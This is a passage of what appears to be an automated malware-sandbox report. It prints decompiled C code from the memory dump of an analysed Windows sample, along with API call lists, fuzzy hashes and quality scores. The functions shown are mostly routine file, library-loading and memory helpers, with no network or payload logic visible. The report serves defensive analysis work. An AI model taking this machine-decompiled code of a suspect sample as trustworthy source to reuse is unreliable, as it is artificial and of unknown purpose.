                                                            					if(_t43 != 0 && VerQueryValueW(_v20, 0x4200a8,  &_v24,  &_v28) != 0) {
                                                            						 *_t79 =  *(_v24 + 0x10) >> 0x00000010 & 0x0000ffff;
                                                            						 *_t77 =  *(_v24 + 0x10) & 0x0000ffff;
                                                            						 *_a4 =  *(_v24 + 0x14) >> 0x00000010 & 0x0000ffff;
                                                            						_v9 = 1;
                                                            					}
                                                            					_pop(_t74);
                                                            					 *[fs:eax] = _t74;
                                                            					_push(0x42007e);
                                                            					return E0040540C(_v20);
                                                            				}
                                                            			}




















                                                            APIs
                                                            • GetFileVersionInfoSizeW.VERSION(00000000,?,00000000,00420094), ref: 0041FFD9
                                                            • GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,00420077,?,00000000,?,00000000,00420094), ref: 00420012
                                                            • VerQueryValueW.VERSION(?,004200A8,?,?,00000000,?,00000000,?,00000000,00420077,?,00000000,?,00000000,00420094), ref: 0042002C
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FileInfoVersion$QuerySizeValue
                                                            • String ID:
                                                            • API String ID: 2179348866-0
                                                            • Opcode ID: db1b7188df03ba7b3b32e0e3197f16d1bbb1710ebdecda22b0e2c2fca2e7d661
                                                            • Instruction ID: 087fa93cc02b824bee97242c1a4c1e6fbe52d07f241be95d6751b2a9bfa32856
                                                            • Opcode Fuzzy Hash: db1b7188df03ba7b3b32e0e3197f16d1bbb1710ebdecda22b0e2c2fca2e7d661
                                                            • Instruction Fuzzy Hash: 19314771A042199FD710DFA9D941DAFB7F8EB48700B91447AF944E3252D778DD00C765
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 72%
                                                            			E0040B110(intOrPtr __eax, void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi) {
                                                            				intOrPtr _v8;
                                                            				signed int _v12;
                                                            				char _v16;
                                                            				char _v20;
                                                            				char _v24;
                                                            				char _v28;
                                                            				signed int _t41;
                                                            				signed short _t43;
                                                            				signed short _t46;
                                                            				signed int _t60;
                                                            				intOrPtr _t68;
                                                            				void* _t79;
                                                            				signed int* _t81;
                                                            				intOrPtr _t84;
                                                            
                                                            				_t79 = __edi;
                                                            				_t61 = __ecx;
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(0);
                                                            				_push(__ebx);
                                                            				_push(__esi);
                                                            				_t81 = __ecx;
                                                            				_v12 = __edx;
                                                            				_v8 = __eax;
                                                            				E00407B04(_v8);
                                                            				E00407B04(_v12);
                                                            				_push(_t84);
                                                            				_push(0x40b227);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t84;
                                                            				E00407A20(__ecx);
                                                            				if(_v12 == 0) {
                                                            					L14:
                                                            					_pop(_t68);
                                                            					 *[fs:eax] = _t68;
                                                            					_push(E0040B22E);
                                                            					return E00407A80( &_v28, 6);
                                                            				}
                                                            				E00407E48( &_v20, _v12);
                                                            				_t41 = _v12;
                                                            				if(_t41 != 0) {
                                                            					_t41 =  *(_t41 - 4);
                                                            				}
                                                            				_t60 = _t41;
                                                            				if(_t60 < 1) {
                                                            					L7:
                                                            					_t43 = E0040AE34(_v8, _t60, _t61,  &_v16, _t81); // executed
                                                            					if(_v16 == 0) {
                                                            						L00403730();
                                                            						E0040A7E4(_t43, _t60,  &_v24, _t79, _t81);
                                                            						_t46 = E0040AF60(_v20, _t60, _t81, _v24, _t79, _t81); // executed
                                                            						__eflags =  *_t81;
                                                            						if( *_t81 == 0) {
                                                            							__eflags =  *0x4bdc0c;
                                                            							if( *0x4bdc0c == 0) {
                                                            								L00403738();
                                                            								E0040A7E4(_t46, _t60,  &_v28, _t79, _t81);
                                                            								E0040AF60(_v20, _t60, _t81, _v28, _t79, _t81);
                                                            							}
                                                            						}
                                                            						__eflags =  *_t81;
                                                            						if(__eflags == 0) {
                                                            							E0040B044(_v20, _t60, _t81, __eflags); // executed
                                                            						}
                                                            					} else {
                                                            						E0040AF60(_v20, _t60, _t81, _v16, _t79, _t81);
                                                            					}
                                                            					goto L14;
                                                            				}
                                                            				while( *((short*)(_v12 + _t60 * 2 - 2)) != 0x2e) {
                                                            					_t60 = _t60 - 1;
                                                            					__eflags = _t60;
                                                            					if(_t60 != 0) {
                                                            						continue;
                                                            					}
                                                            					goto L7;
                                                            				}
                                                            				_t61 = _t60;
                                                            				E004088AC(_v12, _t60, 1,  &_v20);
                                                            				goto L7;
                                                            			}


















                                                            APIs
                                                            • GetUserDefaultUILanguage.KERNEL32(00000000,0040B227,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040B2AE,00000000,?,00000105), ref: 0040B1BB
                                                            • GetSystemDefaultUILanguage.KERNEL32(00000000,0040B227,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040B2AE,00000000,?,00000105), ref: 0040B1E3
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: DefaultLanguage$SystemUser
                                                            • String ID:
                                                            • API String ID: 384301227-0
                                                            • Opcode ID: 8091743a5a45bbad2069f173d476493d8776fa257b9783c2651a700d4e0e0a8f
                                                            • Instruction ID: e5bcb09f7540d0846d638ab8db7cc306f2a88a3609992180fc1e837192b0f5a6
                                                            • Opcode Fuzzy Hash: 8091743a5a45bbad2069f173d476493d8776fa257b9783c2651a700d4e0e0a8f
                                                            • Instruction Fuzzy Hash: B0313070A142499BDB10EBA5C891AAEB7B5EF48304F50857BE400B73D1DB7CAD41CB9E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 58%
                                                            			E0040B234(void* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                            				char _v8;
                                                            				short _v530;
                                                            				char _v536;
                                                            				char _v540;
                                                            				void* _t44;
                                                            				intOrPtr _t45;
                                                            				void* _t49;
                                                            				void* _t52;
                                                            
                                                            				_v536 = 0;
                                                            				_v540 = 0;
                                                            				_v8 = 0;
                                                            				_t49 = __eax;
                                                            				_push(_t52);
                                                            				_push(0x40b2ee);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t52 + 0xfffffde8;
                                                            				GetModuleFileNameW(0,  &_v530, 0x105);
                                                            				E00408550( &_v536, _t49);
                                                            				_push(_v536);
                                                            				E0040858C( &_v540, 0x105,  &_v530);
                                                            				_pop(_t44); // executed
                                                            				E0040B110(_v540, 0,  &_v8, _t44, __edi, _t49); // executed
                                                            				if(_v8 != 0) {
                                                            					LoadLibraryExW(E004084EC(_v8), 0, 2);
                                                            				}
                                                            				_pop(_t45);
                                                            				 *[fs:eax] = _t45;
                                                            				_push(E0040B2F5);
                                                            				E00407A80( &_v540, 2);
                                                            				return E00407A20( &_v8);
                                                            			}












                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B270
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B2C1
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FileLibraryLoadModuleName
                                                            • String ID:
                                                            • API String ID: 1159719554-0
                                                            • Opcode ID: c89eb0a175d0b8486c29a163bc28afc1dff8206c8c77fc3926f93841ada109dc
                                                            • Instruction ID: c66d7809fa1512833e1e01641763b0ecb7dd00f0751393a0e64d94d028879d96
                                                            • Opcode Fuzzy Hash: c89eb0a175d0b8486c29a163bc28afc1dff8206c8c77fc3926f93841ada109dc
                                                            • Instruction Fuzzy Hash: 35116070A4421CABDB10EB55CD86BDE77B8DB04304F5144BEE508B32C1DA785F848AA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 60%
                                                            			E00427154(void* __eax, void* __edx, void* __eflags) {
                                                            				int _v8;
                                                            				char _v16;
                                                            				long _v20;
                                                            				int _t13;
                                                            				intOrPtr _t27;
                                                            				void* _t32;
                                                            				void* _t34;
                                                            				intOrPtr _t35;
                                                            
                                                            				_t32 = _t34;
                                                            				_t35 = _t34 + 0xfffffff0;
                                                            				if(E00427108(__eax,  &_v16) != 0) {
                                                            					_push(_t32);
                                                            					_push(0x4271b1);
                                                            					_push( *[fs:eax]);
                                                            					 *[fs:eax] = _t35;
                                                            					_t13 = DeleteFileW(E004084EC(__edx)); // executed
                                                            					_v8 = _t13;
                                                            					_v20 = GetLastError();
                                                            					_pop(_t27);
                                                            					 *[fs:eax] = _t27;
                                                            					_push(E004271B8);
                                                            					return E00427144( &_v16);
                                                            				} else {
                                                            					_v8 = 0;
                                                            					return _v8;
                                                            				}
                                                            			}












                                                            APIs
                                                            • DeleteFileW.KERNEL32(00000000,00000000,004271B1,?,0000000D,00000000), ref: 0042718B
                                                            • GetLastError.KERNEL32(00000000,00000000,004271B1,?,0000000D,00000000), ref: 00427193
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 2018770650-0
                                                            • Opcode ID: 6bce5fda464dbdacec63520f594f5bcb5d9fb2b97579abb83185b4526990ec2d
                                                            • Instruction ID: b2b9a58b343adce66678156e8009272800f6ed28378062f2bcdc1a6b1bb3db77
                                                            • Opcode Fuzzy Hash: 6bce5fda464dbdacec63520f594f5bcb5d9fb2b97579abb83185b4526990ec2d
                                                            • Instruction Fuzzy Hash: 7AF0C831B08228ABDB01EFB5AC424AEB7E8DF0971479149BBE804E3341E6395D209698
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 37%
                                                            			E00421230(void* __eax, void* __ebx, int __edx) {
                                                            				struct HINSTANCE__* _v12;
                                                            				int _v16;
                                                            				int _t4;
                                                            				struct HINSTANCE__* _t9;
                                                            				void* _t12;
                                                            				intOrPtr _t16;
                                                            				void* _t18;
                                                            				void* _t19;
                                                            				intOrPtr _t20;
                                                            
                                                            				_t18 = _t19;
                                                            				_t20 = _t19 + 0xfffffff4;
                                                            				_t12 = __eax;
                                                            				_t4 = SetErrorMode(__edx); // executed
                                                            				_v16 = _t4;
                                                            				_push(_t18);
                                                            				_push(0x4212a2);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t20;
                                                            				asm("fnstcw word [ebp-0x2]");
                                                            				_push(_t18);
                                                            				_push(0x421284);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t20;
                                                            				_t9 = LoadLibraryW(E004084EC(_t12)); // executed
                                                            				_v12 = _t9;
                                                            				_pop(_t16);
                                                            				 *[fs:eax] = _t16;
                                                            				_push(0x42128b);
                                                            				asm("fclex");
                                                            				asm("fldcw word [ebp-0x2]");
                                                            				return 0;
                                                            			}













                                                            APIs
                                                            • SetErrorMode.KERNEL32 ref: 0042123A
                                                            • LoadLibraryW.KERNEL32(00000000,00000000,00421284,?,00000000,004212A2), ref: 00421269
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: ErrorLibraryLoadMode
                                                            • String ID:
                                                            • API String ID: 2987862817-0
                                                            • Opcode ID: 5d62b3fe4766baadd73c675683546c7f58e01c4ce11fe1a914dda1a55ed8f36c
                                                            • Instruction ID: 4174928c950a8c4d8a753a2a73b5e5f46ee32f9a8ef6f103d2b3a03bcfaff51e
                                                            • Opcode Fuzzy Hash: 5d62b3fe4766baadd73c675683546c7f58e01c4ce11fe1a914dda1a55ed8f36c
                                                            • Instruction Fuzzy Hash: 15F08270A14744BFDB115F779C5282BBAACE709B047A348BAF800F2691E53C48208574
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004052D4() {
                                                            				intOrPtr _t13;
                                                            				intOrPtr* _t14;
                                                            				int _t18;
                                                            				intOrPtr* _t23;
                                                            				void* _t25;
                                                            				void* _t26;
                                                            				void* _t28;
                                                            				void* _t31;
                                                            
                                                            				_t28 =  *0x004BBADC;
                                                            				while(_t28 != 0x4bbad8) {
                                                            					_t2 = _t28 + 4; // 0x4bbad8
                                                            					VirtualFree(_t28, 0, 0x8000); // executed
                                                            					_t28 =  *_t2;
                                                            				}
                                                            				_t25 = 0x37;
                                                            				_t13 = 0x4b7080;
                                                            				do {
                                                            					 *((intOrPtr*)(_t13 + 0xc)) = _t13;
                                                            					 *((intOrPtr*)(_t13 + 8)) = _t13;
                                                            					 *((intOrPtr*)(_t13 + 0x10)) = 1;
                                                            					 *((intOrPtr*)(_t13 + 0x14)) = 0;
                                                            					_t13 = _t13 + 0x20;
                                                            					_t25 = _t25 - 1;
                                                            				} while (_t25 != 0);
                                                            				 *0x4bbad8 = 0x4bbad8;
                                                            				 *0x004BBADC = 0x4bbad8;
                                                            				_t26 = 0x400;
                                                            				_t23 = 0x4bbb78;
                                                            				do {
                                                            					_t14 = _t23;
                                                            					 *_t14 = _t14;
                                                            					_t8 = _t14 + 4; // 0x4bbb78
                                                            					 *_t8 = _t14;
                                                            					_t23 = _t23 + 8;
                                                            					_t26 = _t26 - 1;
                                                            				} while (_t26 != 0);
                                                            				 *0x4bbaf4 = 0;
                                                            				E00405884(0x4bbaf8, 0x80);
                                                            				_t18 = 0;
                                                            				 *0x4bbaf0 = 0;
                                                            				_t31 =  *0x004BDB80;
                                                            				while(_t31 != 0x4bdb7c) {
                                                            					_t10 = _t31 + 4; // 0x4bdb7c
                                                            					_t18 = VirtualFree(_t31, 0, 0x8000);
                                                            					_t31 =  *_t10;
                                                            				}
                                                            				 *0x4bdb7c = 0x4bdb7c;
                                                            				 *0x004BDB80 = 0x4bdb7c;
                                                            				return _t18;
                                                            			}












                                                            APIs
                                                            • VirtualFree.KERNEL32(004BBAD8,00000000,00008000,?,?,?,?,004053D4,0040CB76,00000000,0040CB94), ref: 004052F2
                                                            • VirtualFree.KERNEL32(004BDB7C,00000000,00008000,004BBAD8,00000000,00008000,?,?,?,?,004053D4,0040CB76,00000000,0040CB94), ref: 0040536E
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FreeVirtual
                                                            • String ID:
                                                            • API String ID: 1263568516-0
                                                            • Opcode ID: 2ac254642d4a9788115c799da738c06d3b344f11962515fad3d8dec7c1c1ac76
                                                            • Instruction ID: 8dfda0fc8014d777c4f42bdf36328f4fb77b4e1ecbcf9529c7d2d9386e1eba40
                                                            • Opcode Fuzzy Hash: 2ac254642d4a9788115c799da738c06d3b344f11962515fad3d8dec7c1c1ac76
                                                            • Instruction Fuzzy Hash: A5116D71A046008FC7689F199840B67BBE4EB88754F15C0BFE549EB791D7B8AC018F9C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004232EC(long __eax, void* __edx) {
                                                            				short _v2052;
                                                            				signed int _t7;
                                                            				void* _t10;
                                                            				signed int _t16;
                                                            				void* _t17;
                                                            
                                                            				_t10 = __edx;
                                                            				_t7 = FormatMessageW(0x3200, 0, __eax, 0,  &_v2052, 0x400, 0); // executed
                                                            				while(_t7 > 0) {
                                                            					_t16 =  *(_t17 + _t7 * 2 - 2) & 0x0000ffff;
                                                            					if(_t16 <= 0x20) {
                                                            						L1:
                                                            						_t7 = _t7 - 1;
                                                            						__eflags = _t7;
                                                            						continue;
                                                            					} else {
                                                            						_t20 = _t16 - 0x2e;
                                                            						if(_t16 == 0x2e) {
                                                            							goto L1;
                                                            						}
                                                            					}
                                                            					break;
                                                            				}
                                                            				return E00407BA8(_t10, _t7, _t17, _t20);
                                                            			}









                                                            APIs
                                                            • FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,00423C1E,00000000,00423C6F,?,00423E28), ref: 0042330B
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FormatMessage
                                                            • String ID:
                                                            • API String ID: 1306739567-0
                                                            • Opcode ID: 8c28d4cd2feba8420b72e2c8323dac74420019247290cbce7f55a68a80108edc
                                                            • Instruction ID: 75fedbff241bec6efc8727d26b236f8c34027f11b3bdd8370f626a5f6d270aaf
                                                            • Opcode Fuzzy Hash: 8c28d4cd2feba8420b72e2c8323dac74420019247290cbce7f55a68a80108edc
                                                            • Instruction Fuzzy Hash: 89E0D86075432121F624A9052C03B7B2129A7C0B12FE084367A80DE3D5DEADAF55525E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 31%
                                                            			E00422A18(void* __eax, void* __ebx, void* __ecx, void* __eflags) {
                                                            				char _v8;
                                                            				intOrPtr _t21;
                                                            				intOrPtr _t24;
                                                            
                                                            				_push(0);
                                                            				_push(_t24);
                                                            				_push(0x422a5e);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t24;
                                                            				E004229AC(__eax, __ecx,  &_v8, __eflags);
                                                            				GetFileAttributesW(E004084EC(_v8)); // executed
                                                            				_pop(_t21);
                                                            				 *[fs:eax] = _t21;
                                                            				_push(E00422A65);
                                                            				return E00407A20( &_v8);
                                                            			}







                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,00422A5E,?,?,00000000,?,00422A71,00422DE2,00000000,00422E27,?,?,00000000,00000000), ref: 00422A41
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 8cd9a521966ca01502d57987e2d96a70fbf8ec2bcb71e07358b87aea606a80f7
                                                            • Instruction ID: ce0c41168f735205187e46b6c3e9294348714fcf51f30dd0002a5427be662740
                                                            • Opcode Fuzzy Hash: 8cd9a521966ca01502d57987e2d96a70fbf8ec2bcb71e07358b87aea606a80f7
                                                            • Instruction Fuzzy Hash: D7E09231704308BBD721EB76DE9291AB7ECD788700BA14876B500E7682E6B86E108418
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00423DA8(signed int __ecx, void* __edx, signed char _a4, signed char _a8) {
                                                            				void* _t17;
                                                            
                                                            				_t17 = CreateFileW(E004084EC(__edx),  *(0x4b92e0 + (_a8 & 0x000000ff) * 4),  *(0x4b92ec + (_a4 & 0x000000ff) * 4), 0,  *(0x4b92fc + (__ecx & 0x000000ff) * 4), 0x80, 0); // executed
                                                            				return _t17;
                                                            			}





                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00423DE5
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: dd9159e21b70a0e7bcb8d3c3b5b03a1c2ffc365921e6ade8a7c7864e99aae5ed
                                                            • Instruction ID: 37fe8146f2431012b4276926014d9d5fd10bf57e8855788e2bc853c5fce69268
                                                            • Opcode Fuzzy Hash: dd9159e21b70a0e7bcb8d3c3b5b03a1c2ffc365921e6ade8a7c7864e99aae5ed
                                                            • Instruction Fuzzy Hash: 81E048716441283FD6149ADE7C91F76779C9709754F404563F684D7281C4A59D1086FC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00409FA8(void* __eax) {
                                                            				short _v532;
                                                            				void* __ebx;
                                                            				void* __esi;
                                                            				intOrPtr _t14;
                                                            				void* _t16;
                                                            				void* _t18;
                                                            				void* _t19;
                                                            				intOrPtr _t20;
                                                            				void* _t21;
                                                            
                                                            				_t16 = __eax;
                                                            				_t22 =  *((intOrPtr*)(__eax + 0x10));
                                                            				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
                                                            					GetModuleFileNameW( *(__eax + 4),  &_v532, 0x20a);
                                                            					_t14 = E0040B234(_t21, _t16, _t18, _t19, _t22); // executed
                                                            					_t20 = _t14;
                                                            					 *((intOrPtr*)(_t16 + 0x10)) = _t20;
                                                            					if(_t20 == 0) {
                                                            						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
                                                            					}
                                                            				}
                                                            				return  *((intOrPtr*)(_t16 + 0x10));
                                                            			}













                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 00409FC6
                                                              • Part of subcall function 0040B234: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B270
                                                              • Part of subcall function 0040B234: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B2C1
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FileModuleName$LibraryLoad
                                                            • String ID:
                                                            • API String ID: 4113206344-0
                                                            • Opcode ID: 2301add7ea149dd4fbebfdf59b7b3942b6e3d1df22e9777a155c308e994de31e
                                                            • Instruction ID: 1beb63cefa55d3dba2b36e2095187d50c135a0cf4330adb642bee8d6847d8901
                                                            • Opcode Fuzzy Hash: 2301add7ea149dd4fbebfdf59b7b3942b6e3d1df22e9777a155c308e994de31e
                                                            • Instruction Fuzzy Hash: 7BE0C971A013119BCB10DE58C8C5A4A3798AB08754F044AA6AD24DF387D3B5DD1487D5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00423ED8(intOrPtr* __eax) {
                                                            				int _t4;
                                                            				intOrPtr* _t7;
                                                            
                                                            				_t7 = __eax;
                                                            				_t4 = SetEndOfFile( *(__eax + 4)); // executed
                                                            				if(_t4 == 0) {
                                                            					return E00423CAC( *_t7);
                                                            				}
                                                            				return _t4;
                                                            			}






                                                            APIs
                                                            • SetEndOfFile.KERNEL32(?,7FBA0010,004B6358,00000000), ref: 00423EDF
                                                              • Part of subcall function 00423CAC: GetLastError.KERNEL32(004237FC,00423D4F,?,?,00000000,?,004B5F76,00000001,00000000,00000002,00000000,004B659E,?,00000000,004B65E2), ref: 00423CAF
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: ErrorFileLast
                                                            • String ID:
                                                            • API String ID: 734332943-0
                                                            • Opcode ID: 09339d9670a81d77462708df034512c3e9d7a5ee9c38b49a5b5d33688a33920b
                                                            • Instruction ID: ae15968ab9cd064c61534cde2c099b4aac4a7b80231ae1acb8e6de6fcc6ca8bf
                                                            • Opcode Fuzzy Hash: 09339d9670a81d77462708df034512c3e9d7a5ee9c38b49a5b5d33688a33920b
                                                            • Instruction Fuzzy Hash: 58C04C61300210478B04EEBBD5C190666E85B582157414466B904DB216E67DD9158615
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0040CAA4() {
                                                            				intOrPtr _v16;
                                                            				struct _SYSTEM_INFO* _t3;
                                                            
                                                            				GetSystemInfo(_t3); // executed
                                                            				return _v16;
                                                            			}






                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: InfoSystem
                                                            • String ID:
                                                            • API String ID: 31276548-0
                                                            • Opcode ID: 9dd1f6b5bb1b0da35443b21aa4a452d0333aba70165927044b368234b0936b7a
                                                            • Instruction ID: 4f21eec972071caf62eebbeb90550a79e4d7a8082c8b53f17589c9beddeb5e45
                                                            • Opcode Fuzzy Hash: 9dd1f6b5bb1b0da35443b21aa4a452d0333aba70165927044b368234b0936b7a
                                                            • Instruction Fuzzy Hash: CDA012984088002AC404AB194C4340F39C819C1114FC40224745CB62C2E61D866403DB
                                                            Uniqueness

